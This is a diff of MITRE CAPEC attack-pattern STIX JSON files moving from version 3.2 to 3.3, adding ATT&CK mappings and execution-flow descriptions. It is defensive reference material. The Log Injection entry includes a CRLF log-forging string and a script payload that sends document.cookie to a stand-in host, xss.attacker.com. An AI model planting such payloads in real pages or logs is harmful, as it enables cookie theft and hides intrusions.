+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--76153e9c-11e7-41aa-9e71-dc632eeee30a",
"id": "bundle--c0acdf8a-8880-4144-b238-f0ab5d1946d6",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2017-01-06T00:00:00.000Z",
"modified": "2017-01-06T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Absolute Path Traversal",
"description": "An adversary with access to file system resources, either directly or via application logic, will use various file absolute paths and navigation mechanisms such as \"..\" to extend their range of access to inappropriate areas of the file system. The goal of the adversary is to access directories and files that are intended to be restricted from their access.",
"external_references": [
@@ -52,7 +52,7 @@
"Medium": "Programming attacks."
},
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b.json
+3 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--e1d41b32-49de-4525-9f31-161c37f30a16",
"id": "bundle--d18455b7-d4c3-463c-948f-e638865a808b",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Probe iOS Screenshots",
"description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface.",
"external_references": [
@@ -31,7 +31,7 @@
"This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)."
],
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1bc4fd64-65a6-41d4-ac68-8e3692eabe29.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--6059f8e9-ee71-4ff8-8536-5fc2ab8eebee",
"id": "bundle--b53e9c69-15fc-480f-83dc-02f61a974424",
"spec_version": "2.0",
"objects": [
{
@@ -54,7 +54,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1be52fc4-a498-4d01-9a68-b560e64e0abf.json
+3 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--c5d5ceb5-8cbb-4969-bc1a-905b896c2b3b",
"id": "bundle--a000f612-87af-4832-bab9-eb16f3f49d41",
"spec_version": "2.0",
"objects": [
{
@@ -42,6 +42,7 @@
"x_capec_example_instances": [
"Using MITM techniques, an attacker launches a blockwise chosen-boundary attack to obtain plaintext HTTP headers by taking advantage of an SSL session using an encryption protocol in CBC mode with chained initialization vectors (IV). This allows the attacker to recover session IDs, authentication cookies, and possibly other valuable data that can be used for further exploitation. Additionally this could allow for the insertion of data into the stream, allowing for additional attacks (CSRF, SQL inject, etc) to occur."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>Determine the configuration levels of either the server or client being targeted, preferably both. This is not a hard requirement, as the attacker can simply assume commonly exploitable configuration settings and blindly attempt them.</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>Provide controlled access to the server by the client, by either providing a link for the client to click on, or by positioning one's self at a place on the network to intercept and control the flow of data between client and server, e.g. MITM (man in the middle).</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Insert the malicious data into the stream that takes advantage of the configuration flaw.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"Access to the client/server stream."
@@ -53,7 +54,7 @@
"High": "The attacker needs real-time access to network traffic in such a manner that the attacker can grab needed information from the SSL stream, possibly influence the decided-upon encryption method and options, and perform automated analysis to decipher encrypted material recovered. Tools exist to automate part of the tasks, but to successfully use these tools in an attack scenario requires detailed understanding of the underlying principles."
},
"x_capec_status": "Draft",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1c4b22ea-6dfc-4a95-917e-a7f11f3d34eb.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--ac1bb851-9633-44ec-a1bd-62fb6a99fba9",
"id": "bundle--8a215d40-3701-4fa1-a361-71054a0ced47",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Standard",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json
+10 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--a55290e7-137b-4568-8e30-961ebe153367",
"id": "bundle--c4622028-d6a0-4931-bfd2-c38ef8aa7c8f",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Hijacking a Privileged Thread of Execution",
"description": "Adversaries can sometimes hijack a privileged thread from the underlying system through synchronous (calling a privileged function that returns incorrectly) or asynchronous (callbacks, signal handlers, and similar) means. This can allow the adversary to access functionality the system's designer didn't intend for them to, but they may also go undetected or deny other users essential services in a catastrophic (or insidiously subtle) way.",
"external_references": [
@@ -21,6 +21,12 @@
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/270.html",
"external_id": "CWE-270"
},
{
"source_name": "ATTACK",
"description": "Process Injection:Thread Execution Hijacking",
"url": "https://attack.mitre.org/wiki/Technique/T1055/003",
"external_id": "T1055.003"
}
],
"object_marking_refs": [
@@ -48,6 +54,7 @@
"x_capec_example_instances": [
"Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p>Adversary determines the underlying system thread that is subject to user-control</p></li></ol></div><div><h3>Experiment</h3><ol><li> <p>Adversary then provides input, perhaps by way of environment variables for the process in question, that affect the executing thread</p></li></ol></div><div><h3>Exploit</h3><ol><li> <p>Upon successful hijacking, the adversary enjoys elevated privileges, and can possibly have the hijacked thread do their bidding.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users",
@@ -61,7 +68,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json
+4 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--6d216e07-0cb2-41fb-81fa-d4e5facd6cf3",
"id": "bundle--c1f4169b-a2e2-4689-950e-2f660c5090c1",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Escaping a Sandbox by Calling Signed Code in Another Language",
"description": "The attacker may submit a malicious signed code from another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.",
"external_references": [
@@ -60,6 +60,7 @@
"x_capec_example_instances": [
"Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003."
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Probing: </b>The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker probes the target application to see whether calling signed code from another language is allowed within a sandbox.</td></tr></tbody></table><li> <p> <b>Analysis: </b>The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.</td></tr></tbody></table></ol></div><div><h3>Experiment</h3><ol><li> <p> <b>Verify the exploitable security weaknesses: </b>The attacker tries to craft malicious signed code from another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker tries to explore the security weaknesses by calling malicious signed code from another language allowed by the sandbox.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Exploit the security weaknesses in the standard libraries: </b>The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>The attacker calls signed malicious code from another language to exploit the security weaknesses in the standard libraries.</td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "Low",
"x_capec_prerequisites": [
"A framework-based language that supports code signing and sandbox (such as Java, .Net, JavaScript, and Flash) Deployed code that has been signed by its authoring vendor, or a partner"
@@ -72,7 +73,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--8e3a9e9a-f034-4d51-a933-5b86c2b5f433",
"id": "bundle--63858d99-6799-4407-b9c7-aefc3ca45a62",
"spec_version": "2.0",
"objects": [
{
@@ -67,7 +67,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--da22a5db-ec9e-4b0a-a4ef-0809dddb5d0e",
"id": "bundle--784bbfce-8836-4c17-be77-72e3313b205b",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json
+11 -4
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--60527e2f-5040-41f9-9f21-ed24df665c31",
"id": "bundle--5388c3a3-69b0-4e95-84c4-a0a3055d8b22",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Log Injection-Tampering-Forging",
"description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.",
"description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.",
"external_references": [
{
"source_name": "capec",
@@ -37,6 +37,12 @@
"url": "http://cwe.mitre.org/data/definitions/713.html",
"external_id": "CWE-713"
},
{
"source_name": "ATTACK",
"description": "Indicator Removal on Host",
"url": "https://attack.mitre.org/wiki/Technique/T1070",
"external_id": "T1070"
},
{
"source_name": "reference_from_CAPEC",
"description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley",
@@ -74,6 +80,7 @@
"Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201",
"\n <xhtml:p>If a user submits the string \"twenty-one\" for val, the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">INFO: Failed to parse val=twenty-one</xhtml:div>\n <xhtml:p>However, if an attacker submits the string</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">twenty-one%0a%0aINFO:+User+logged+out%3dbadguy</xhtml:div>\n <xhtml:p>the following entry is logged:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy</xhtml:div>\n <xhtml:p>Clearly, attackers can use this same mechanism to insert arbitrary log entries.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Explore</h3><ol><li> <p> <b>Determine Application's Log File Format: </b>The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>Determine logging utility being used by application (e.g. log4j)</td></tr><tr><td>Gain access to application's source code to determine log file formats.</td></tr><tr><td>Install or obtain access to instance of application and observe its log file format.</td></tr></tbody></table></ol></div><div><h3>Exploit</h3><ol><li> <p> <b>Manipulate Log Files: </b>The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.</p></li><table><tbody><tr><th>Techniques</th></tr><tr><td>\n <xhtml:p>Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">\"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"</xhtml:div>\n <xhtml:p>may add the following forged entry into a log file:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"result\">\"[Thu Nov 12 12:11:22]:Info: User admin logged in\"</xhtml:div>\n <xhtml:p>Different applications may require different encodings of the carriage return and line feed characters.</xhtml:p>\n </td></tr><tr><td>\n <xhtml:p>Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\"><script>new Image().src=\"http://xss.attacker.com/log_cookie?cookie=\"+encodeURI(document.cookie);</script></xhtml:div>\n <xhtml:p>The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).</xhtml:p>\n </td></tr></tbody></table></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The target host is logging the action and data of the user.",
@@ -85,7 +92,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--4db3532d-0a5c-4894-b230-14a34b0cd1fa",
"id": "bundle--7f6d7a0c-a960-46e8-9e4a-591eb61daf0c",
"spec_version": "2.0",
"objects": [
{
@@ -40,7 +40,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--9924d230-7833-4f94-b891-dd4ae84fdecc",
"id": "bundle--2ac027f1-cdb6-479b-ba46-6681282e9587",
"spec_version": "2.0",
"objects": [
{
@@ -36,7 +36,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--5f72f01c-e1e2-48ab-bb5c-8cf6f68d17c4",
"id": "bundle--db17c7e3-e444-4de1-b3f3-7372d0007eab",
"spec_version": "2.0",
"objects": [
{
@@ -89,7 +89,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--90db9e44-bdc4-41c5-89fd-8d1601c0cdc7",
"id": "bundle--18831a2a-87eb-4e3b-bcb4-7315039730ec",
"spec_version": "2.0",
"objects": [
{
@@ -36,7 +36,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--c4e3a448-6bf4-4ae0-b870-d1161a2210fb",
"id": "bundle--61a0dd37-3266-4415-bf83-4f2a406143e5",
"spec_version": "2.0",
"objects": [
{
@@ -30,7 +30,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--e0c7156d-5ba1-4051-98db-5d2ad103acc3",
"id": "bundle--2e2c329a-58f4-4441-9b50-836627501587",
"spec_version": "2.0",
"objects": [
{
@@ -23,7 +23,7 @@
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json
+11 -5
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--16677edd-a87f-4fe0-a337-ef7fec934ede",
"id": "bundle--749133ab-1802-44f6-ba57-594b6dc2dd77",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Read Sensitive Strings Within an Executable",
"description": "An adversary engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Read Sensitive Constants Within an Executable",
"description": "\n <xhtml:p>An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable.</xhtml:p>\n <xhtml:p>These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.</xhtml:p>\n <xhtml:p>Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.</xhtml:p>\n ",
"external_references": [
{
"source_name": "capec",
@@ -22,6 +22,12 @@
"url": "http://cwe.mitre.org/data/definitions/798.html",
"external_id": "CWE-798"
},
{
"source_name": "ATTACK",
"description": "Unsecured Credentials:Credentials in files",
"url": "https://attack.mitre.org/wiki/Technique/T1552/001",
"external_id": "T1552.001"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
@@ -53,7 +59,7 @@
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b.json
+2 -2
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--96fe9cb5-6cb7-4e1b-b6a5-605248aab970",
"id": "bundle--02a29359-05f2-4558-91af-3a569839f707",
"spec_version": "2.0",
"objects": [
{
@@ -50,7 +50,7 @@
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json
+4 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--22618bbf-3029-4521-bd33-5e0417f36fe3",
"id": "bundle--c1be5b05-cc27-4869-9a23-8f15da5b5a20",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Reflection Attack in Authentication Protocol",
"description": "An attacker can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the attacker illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An attacker can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.",
"external_references": [
@@ -55,6 +55,7 @@
"x_capec_example_instances": [
"\n <xhtml:p>A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.</xhtml:p>\n <xhtml:p>An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.</xhtml:p>\n "
],
"x_capec_execution_flow": "<h2> Execution Flow </h2><div><h3>Experiment</h3><ol><li> <p>The attacker opens a connection to the target server and sends it a challenge</p></li><li> <p>The server responds by returning the challenge encrypted with a shared secret as well as its own challenge to the attacker</p></li><li> <p>Since the attacker does not possess the shared secret, they initiate a second connection to the server and sends it, as challenge, the challenge received from the server on the first connection</p></li><li> <p>The server treats this as just another handshake and responds by encrypting the challenge and issuing its own to the attacker</p></li><li> <p>The attacker now receives the encrypted challenge on the second connection and sends it as response to the server on the first connection, thereby successfully completing the handshake and authenticating to the server.</p></li></ol></div>",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol."
@@ -67,7 +68,7 @@
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json
+9 -3
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--0331f548-a99b-4b02-a082-a4148f332f2b",
"id": "bundle--1b11018c-5840-4322-b690-b60e0800edc9",
"spec_version": "2.0",
"objects": [
{
@@ -8,7 +8,7 @@
"id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Application Footprinting",
"description": "An adversary engages in active probing and exploration activities to determine the type or version of an application installed on a remote target. This differs from fingerprinting where the attacker's action is passive through the examination of application output.",
"external_references": [
@@ -16,6 +16,12 @@
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/580.html",
"external_id": "CAPEC-580"
},
{
"source_name": "ATTACK",
"description": "Software Discovery",
"url": "https://attack.mitre.org/wiki/Technique/T1518",
"external_id": "T1518"
}
],
"object_marking_refs": [
@@ -36,7 +42,7 @@
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
"x_capec_version": "3.3"
}
]
}
capec/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json
+20 -10
View File
@@ -1,6 +1,6 @@
{
"type": "bundle",
"id": "bundle--6656678d-8b60-4b37-8896-4c933f1625d6",
"id": "bundle--a3d84ad6-0224-4c8b-bb84-442b15c44c4b",
"spec_version": "2.0",
"objects": [
{
@@ -8,9 +8,9 @@
"id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228",
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"name": "Exploitation of Trusted Credentials",
"description": "Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.",
"modified": "2020-07-30T00:00:00.000Z",
"name": "Exploitation of Trusted Identifiers",
"description": "\n <xhtml:p>An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service. Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This further allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.</xhtml:p>\n <xhtml:p>Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so. Many server side processes are 